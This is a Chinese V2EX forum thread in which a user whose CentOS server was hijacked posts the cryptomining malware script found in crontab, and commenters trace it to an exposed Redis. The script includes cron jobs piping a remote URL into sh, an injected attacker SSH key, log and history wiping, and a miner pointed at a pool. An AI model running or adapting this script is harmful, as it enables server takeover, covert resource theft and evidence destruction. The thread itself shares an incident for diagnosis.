V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
dengshuang
V2EX  ›  Linux

Linux 被黑了,来看看这是什么回事。。。

  •  
  •   dengshuang · 2018-04-16 14:36:27 +08:00 · 12359 次点击
    这是一个创建于 2406 天前的主题,其中的信息可能已经有所发展或是发生改变。

    系统 centos7

    今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下: 图片

    很浪啊,赶紧 kill -9 杀掉进程,单一下子就有起来了。 灵光一闪,查看 crontab,如图: crontab 用 crontab 里的链接下载了这个 sh:

    #!/bin/bash
    ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9
    skill -KILL udevs
    skill -KILL kworkers
    rm -rf /var/lib/apt/lists/*
    apt-get update
    apt-get install wget -y
    apt-get install libcurl4-openssl-dev -y
    apt-get install python-pip -y
    apt-get install ca-certificates -y
    apt-get install redis-tools -y
    apt-get install python gcc -y
    apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated
    yum -y install epel-release
    yum -y install wget gcc redis git python-pip ca-certificates
    echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root
    echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    mkdir -p /root/.ssh/
    echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root
    echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys
    PS3=$(iptables -L | grep 6379 | wc -l)
    if [ $PS3 -eq 0 ];
    then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
    fi
    echo "" > /var/log/wtmp
    echo "" > /var/log/secure
    history -c
    if [ ! -f "/tmp/migrations" ];then
    wget https://transfer.sh/SstPD/clay  --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay
    wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations
    curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations
    fi
    cd /tmp
    PS1=$(ps aux | grep clay | grep -v "grep" | wc -l)
    if [ $PS1 -eq 0 ];
    then
        /tmp/clay &
    fi
    PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l)
    if [ $PS2 -eq 0 ];
    then
        /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
    fi
    if [ $? -ne 0 -a $PS2 -eq 0 ];
    then
    wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c 
    fi
    if [ $PS3 -eq 0 ];
    then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
    fi
    
    
    

    各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了,想仔细研究研究他到底在干嘛

    45 条回复    2018-04-19 08:38:37 +08:00
    dengshuang
        1
    dengshuang  
    OP
       2018-04-16 14:39:09 +08:00   ❤️ 3
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys

    这一条很是邪恶啊
    henryshen233
        2
    henryshen233  
       2018-04-16 14:40:23 +08:00
    @dengshuang 拽了
    henryshen233
        3
    henryshen233  
       2018-04-16 14:40:33 +08:00
    我说一楼
    u5f20u98de
        4
    u5f20u98de  
       2018-04-16 14:42:55 +08:00   ❤️ 1
    看样子的确是被拿来挖矿了,看命令是用了一个未授权访问的 redis 漏洞(因为替你把 6379 关上不让别人搞)
    hcymk2
        5
    hcymk2  
       2018-04-16 14:44:10 +08:00   ❤️ 1
    xmr 门罗币
    doun
        6
    doun  
       2018-04-16 14:46:45 +08:00 via Android   ❤️ 1
    pool.zer0day.ru:8080 这个好像是挖矿的。找到漏洞了吗怎么被搞的?
    wampyl
        7
    wampyl  
       2018-04-16 14:46:46 +08:00
    被拿来挖矿了
    Felldeadbird
        8
    Felldeadbird  
       2018-04-16 14:49:12 +08:00
    @u5f20u98de 良心黑产脚本?
    murusu
        9
    murusu  
       2018-04-16 15:00:09 +08:00   ❤️ 2
    被人拿来当矿机了
    很奇怪的是你这机子允许 root 帐号远程登录?
    bearqq
        10
    bearqq  
       2018-04-16 15:01:11 +08:00 via Android
    Stratum 字样挖矿无疑
    有可能是 ssh 密码破解搞进来的,别的弱密码也可能,1day 漏洞也可能看你更新不。
    jasonyang9
        11
    jasonyang9  
       2018-04-16 15:02:27 +08:00   ❤️ 2
    ```
    /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
    ```

    还保留了 15%CPU 给你用,良心啊
    hcymk2
        12
    hcymk2  
       2018-04-16 15:06:42 +08:00
    echo "" > /var/log/wtmp
    echo "" > /var/log/secure
    history -c
    geagerg
        13
    geagerg  
       2018-04-16 15:09:31 +08:00   ❤️ 1
    见过个类似的,看看是不是 redis 开了外网访问但是没设密码或者弱密码或或者配置文件有误未生效
    dengshuang
        14
    dengshuang  
    OP
       2018-04-16 15:12:35 +08:00   ❤️ 1
    @murusu 不是这是内网的电脑,当时通过代理,把 6379 端口 redis 代理出去了。redis 是用 root 运行的。
    dengshuang
        15
    dengshuang  
    OP
       2018-04-16 15:13:07 +08:00
    @jasonyang9 尴尬,哈哈
    EXE
        16
    EXE  
       2018-04-16 15:14:34 +08:00   ❤️ 1
    前几天服务器刚中了挖门罗币的病毒,而且用的还是 docker 来跑的。。。
    jingdaihuaxia
        17
    jingdaihuaxia  
       2018-04-16 15:15:03 +08:00
    被挖矿了?
    u5f20u98de
        18
    u5f20u98de  
       2018-04-16 15:20:38 +08:00
    @Felldeadbird 不是良心,是怕被别家黑客工具用了,竞争也很激烈啊。
    4ever911
        19
    4ever911  
       2018-04-16 15:22:23 +08:00
    我前几天配置的 SS 也被黑了用作 ddos,客服发 email 说关停了我的机器,我上去一看,几个小时打了 300G 流量。。。。。 也不知道是如何黑的,后来果断重新弄了一台,关了 root 远程登录,关闭密码登陆。
    nicevar
        20
    nicevar  
       2018-04-16 15:42:58 +08:00
    估计是 ssh 被爆破进入的
    Rootcat
        21
    Rootcat  
       2018-04-16 15:44:15 +08:00
    看了这个,我竟然想到的是拿我闲置的服务器来挖门罗币,不知道能挖多少。。。
    lopetver
        22
    lopetver  
       2018-04-16 15:45:10 +08:00
    migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B

    这条命令已经说明是在挖矿了
    kongkongyzt
        23
    kongkongyzt  
       2018-04-16 15:47:11 +08:00
    @dengshuang #1 +1, 刚想回这个, 这条 hhh
    lopetver
        24
    lopetver  
       2018-04-16 15:57:17 +08:00
    @kongkongyzt 求解这条是什么意思
    FindBoyFriend
        25
    FindBoyFriend  
       2018-04-16 16:01:56 +08:00
    一项喜欢用 keys 登陆 ssh,就差两步验证了
    f2f2f
        26
    f2f2f  
       2018-04-16 16:13:32 +08:00
    @jasonyang9 然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽
    imaning
        27
    imaning  
       2018-04-16 16:41:57 +08:00
    @Rootcat 照这么说,我手上有 3 台服务器,都是闲置的,我也该去试试挖矿?
    king2014
        28
    king2014  
       2018-04-16 16:44:23 +08:00
    @lopetver 直接加入自己的密钥,可以随时登录了,不需要密码
    dengshuang
        29
    dengshuang  
    OP
       2018-04-16 16:44:33 +08:00
    @lopetver 免密码 登陆
    airycanon
        30
    airycanon  
       2018-04-16 16:53:54 +08:00
    你是不是用 root 启动 redis 了并且对外网是开放的?
    sdzwb
        31
    sdzwb  
       2018-04-16 16:56:48 +08:00
    这是服务器被入侵,同时用于挖矿的步骤啊。
    要杜绝还得找服务器漏洞的根源,然后再去堵。
    YMB
        32
    YMB  
       2018-04-16 17:10:16 +08:00
    前段时间研究过 redis 漏洞,但新版本貌似怎么都不能生效,楼主 redis 版本是多少?
    有可疑 key 之类的一些信息吗,有的话麻烦提供一下大家研究研究
    ZackB0T
        33
    ZackB0T  
       2018-04-16 17:15:41 +08:00 via Android
    最简单的方式,云墙 设置下 ssh 端口么? ip 或者 IP 段放行。
    挖门罗的
    打算挖的,给你个参考,G620 CentOS 倆核算力 50,如果支持 aes 能快不少。但是 cpu 自己挖电费回不来,矿池一般 0.3 提,这算力基本一年提不出来。
    YumeMichi
        34
    YumeMichi  
       2018-04-16 18:21:36 +08:00
    让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序
    Miy4mori
        35
    Miy4mori  
       2018-04-16 18:50:45 +08:00
    @Felldeadbird 你怎么理解到良心的,明显怕后来人把自己蹬了啊。
    jeffson
        36
    jeffson  
       2018-04-16 19:11:16 +08:00
    stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊
    lusi1990
        37
    lusi1990  
       2018-04-16 19:28:29 +08:00 via Android
    我也被黑锅,cpu 占用了 100%
    DeWhite
        38
    DeWhite  
       2018-04-16 20:06:31 +08:00
    @jasonyang9 我之前查日志菜发现 只被用了 50%,这不算良心
    projectzoo
        39
    projectzoo  
       2018-04-16 23:03:32 +08:00
    @dengshuang #1 有点意思,这个。。
    msg7086
        40
    msg7086  
       2018-04-17 00:00:43 +08:00
    无密码全球公开 root 账户运行的 redis,不拿来挖矿难道还留着过年?
    defunct9
        41
    defunct9  
       2018-04-17 06:16:19 +08:00 via iPhone
    挖门罗币种的

    开 ssh,让我上去也挖挖
    winglight2016
        42
    winglight2016  
       2018-04-17 10:59:30 +08:00
    一般 VPS 都会禁止挖矿的
    henryshen233
        43
    henryshen233  
       2018-04-17 11:24:12 +08:00
    @4ever911 上次我的 Linode 也流量暴涨,后来只开放必要端口就好了
    xiayun
        44
    xiayun  
       2018-04-17 16:09:33 +08:00
    挖矿的,应该是利用 redis 端口漏洞进来的,因为 redis 默认是不用用户密码的
    infra
        45
    infra  
       2018-04-19 08:38:37 +08:00
    被偷挖挖门罗币了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   955 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 21:33 · PVG 05:33 · LAX 13:33 · JFK 16:33
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.